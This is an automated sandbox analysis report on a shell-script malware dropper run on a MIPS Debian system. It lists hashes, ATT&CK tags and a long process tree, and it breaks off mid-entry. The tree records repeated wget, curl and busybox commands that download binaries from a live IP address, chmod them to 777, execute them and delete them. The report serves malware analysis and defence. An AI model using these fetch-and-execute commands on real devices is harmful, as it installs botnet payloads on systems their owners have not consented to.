fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939

Analysis

max time kernel
104s
max time network
134s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
20/11/2024, 03:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh
Size

10KB
MD5

2790535985a336c1e26b994e26754331
SHA1

3c9c3751a3bfd775ab2063c28c7780ddc87e1d9b
SHA256

fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939
SHA512

f2822208fdda3dc5040623c5de5b91212d6e9cde8b7aef05790ed0bf45574dbcb3e0fbe3b0589dc4babd8edf667cef18e76f3ef6d5c295b84391a99bee61b8b3
SSDEEP

96:yl7siIiUiPcEbwC/+LC2OqK0kSnSG+Jpm67Yb6H4kU83qpSG+Jpf/7/tvnsiIiUl:yl7sjPECU4nSG+Jpm6ASG+JpDWjPl

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
950	chmod
962	chmod
745	chmod
806	chmod
854	chmod
860	chmod
902	chmod
751	chmod
812	chmod
896	chmod
980	chmod
884	chmod
968	chmod
974	chmod
890	chmod
908	chmod
920	chmod
926	chmod
986	chmod
878	chmod
932	chmod
866	chmod
872	chmod
944	chmod
956	chmod
829	chmod
914	chmod
938	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J	curl
File opened for modification	/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0	curl
File opened for modification	/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev	curl
File opened for modification	/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz	curl
File opened for modification	/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ	curl
File opened for modification	/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g	curl
File opened for modification	/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1	curl
File opened for modification	/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC	curl
File opened for modification	/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ	curl
File opened for modification	/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL	curl
File opened for modification	/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0	curl
File opened for modification	/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J	curl
File opened for modification	/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ	curl
File opened for modification	/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL	curl
File opened for modification	/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g	curl
File opened for modification	/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto	curl
File opened for modification	/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev	curl
File opened for modification	/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD	curl
File opened for modification	/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto	curl
File opened for modification	/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ	curl
File opened for modification	/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC	curl
File opened for modification	/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD	curl
File opened for modification	/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0	curl
File opened for modification	/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d	curl
File opened for modification	/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d	curl
File opened for modification	/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz	curl
File opened for modification	/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1	curl
File opened for modification	/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0	curl

/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh
/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh
1⤵
PID:713
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:717
- /usr/bin/wget
  wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  PID:722
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:736
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  PID:743
- /bin/chmod
  chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  - File and Directory Permissions Modification
  PID:745
- /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  ./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  - Executes dropped EXE
  PID:746
- /bin/rm
  rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  PID:747
- /usr/bin/wget
  wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  PID:748
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:749
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  PID:750
- /bin/chmod
  chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  - File and Directory Permissions Modification
  PID:751
- /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  ./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  - Executes dropped EXE
  PID:752
- /bin/rm
  rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  PID:753
- /usr/bin/wget
  wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  PID:754
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:755
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  PID:805
- /bin/chmod
  chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  - File and Directory Permissions Modification
  PID:806
- /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  ./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  - Executes dropped EXE
  PID:807
- /bin/rm
  rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  PID:808
- /usr/bin/wget
  wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  PID:809
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:810
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  PID:811
- /bin/chmod
  chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  - File and Directory Permissions Modification
  PID:812
- /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  ./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  - Executes dropped EXE
  PID:813
- /bin/rm
  rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  PID:814
- /usr/bin/wget
  wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  PID:815
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:816
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  PID:823
- /bin/chmod
  chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  - File and Directory Permissions Modification
  PID:829
- /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  ./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  - Executes dropped EXE
  PID:831
- /bin/rm
  rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  PID:834
- /usr/bin/wget
  wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  PID:835
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:844
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  PID:853
- /bin/chmod
  chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  - File and Directory Permissions Modification
  PID:854
- /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  ./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  - Executes dropped EXE
  PID:855
- /bin/rm
  rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  PID:856
- /usr/bin/wget
  wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  PID:857
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:858
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  PID:859
- /bin/chmod
  chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  - File and Directory Permissions Modification
  PID:860
- /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  ./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  - Executes dropped EXE
  PID:861
- /bin/rm
  rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  PID:862
- /usr/bin/wget
  wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  PID:863
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:864
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  PID:865
- /bin/chmod
  chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  - File and Directory Permissions Modification
  PID:866
- /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  ./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  - Executes dropped EXE
  PID:867
- /bin/rm
  rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  PID:868
- /usr/bin/wget
  wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  PID:869
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:870
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  PID:871
- /bin/chmod
  chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  - File and Directory Permissions Modification
  PID:872
- /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  ./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  - Executes dropped EXE
  PID:873
- /bin/rm
  rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  PID:874
- /usr/bin/wget
  wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  PID:875
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:876
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  PID:877
- /bin/chmod
  chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  - File and Directory Permissions Modification
  PID:878
- /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  ./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  - Executes dropped EXE
  PID:879
- /bin/rm
  rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  PID:880
- /usr/bin/wget
  wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  PID:881
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:882
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  PID:883
- /bin/chmod
  chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  - File and Directory Permissions Modification
  PID:884
- /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  ./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  - Executes dropped EXE
  PID:885
- /bin/rm
  rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  PID:886
- /usr/bin/wget
  wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  PID:887
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:888
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  PID:889
- /bin/chmod
  chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  - File and Directory Permissions Modification
  PID:890
- /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  ./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  - Executes dropped EXE
  PID:891
- /bin/rm
  rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  PID:892
- /usr/bin/wget
  wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  PID:893
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:894
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  PID:895
- /bin/chmod
  chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  - File and Directory Permissions Modification
  PID:896
- /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  ./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  - Executes dropped EXE
  PID:897
- /bin/rm
  rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  PID:898
- /usr/bin/wget
  wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  PID:899
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:900
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  PID:901
- /bin/chmod
  chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  - File and Directory Permissions Modification
  PID:902
- /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  ./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  - Executes dropped EXE
  PID:903
- /bin/rm
  rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  PID:904
- /usr/bin/wget
  wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  PID:905
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:906
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  PID:907
- /bin/chmod
  chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  - File and Directory Permissions Modification
  PID:908
- /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  ./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  - Executes dropped EXE
  PID:909
- /bin/rm
  rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  PID:910
- /usr/bin/wget
  wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  PID:911
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:912
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  PID:913
- /bin/chmod
  chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  - File and Directory Permissions Modification
  PID:914
- /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  ./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  - Executes dropped EXE
  PID:915
- /bin/rm
  rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  PID:916
- /usr/bin/wget
  wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  PID:917
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:918
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  PID:919
- /bin/chmod
  chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  - File and Directory Permissions Modification
  PID:920
- /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  ./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  - Executes dropped EXE
  PID:921
- /bin/rm
  rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  PID:922
- /usr/bin/wget
  wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  PID:923
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:924
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  PID:925
- /bin/chmod
  chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  - File and Directory Permissions Modification
  PID:926
- /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  ./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  - Executes dropped EXE
  PID:927
- /bin/rm
  rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  PID:928
- /usr/bin/wget
  wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  PID:929
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:930
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  PID:931
- /bin/chmod
  chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  - File and Directory Permissions Modification
  PID:932
- /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  ./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  - Executes dropped EXE
  PID:933
- /bin/rm
  rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  PID:934
- /usr/bin/wget
  wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  PID:935
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:936
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  PID:937
- /bin/chmod
  chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  - File and Directory Permissions Modification
  PID:938
- /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  ./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  - Executes dropped EXE
  PID:939
- /bin/rm
  rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  PID:940
- /usr/bin/wget
  wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  PID:941
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:942
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  PID:943
- /bin/chmod
  chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  - File and Directory Permissions Modification
  PID:944
- /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  ./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  - Executes dropped EXE
  PID:945
- /bin/rm
  rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  PID:946
- /usr/bin/wget
  wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  PID:947
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:948
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  PID:949
- /bin/chmod
  chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  - File and Directory Permissions Modification
  PID:950
- /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  ./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  - Executes dropped EXE
  PID:951
- /bin/rm
  rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  PID:952
- /usr/bin/wget
  wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  PID:953
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:954
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  PID:955
- /bin/chmod
  chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  - File and Directory Permissions Modification
  PID:956
- /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  ./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  - Executes dropped EXE
  PID:957
- /bin/rm
  rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  PID:958
- /usr/bin/wget
  wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  PID:959
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:960
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  PID:961
- /bin/chmod
  chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  - File and Directory Permissions Modification
  PID:962
- /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  ./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  - Executes dropped EXE
  PID:963
- /bin/rm
  rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  PID:964
- /usr/bin/wget
  wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  PID:965
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:966
- /bin/busybox
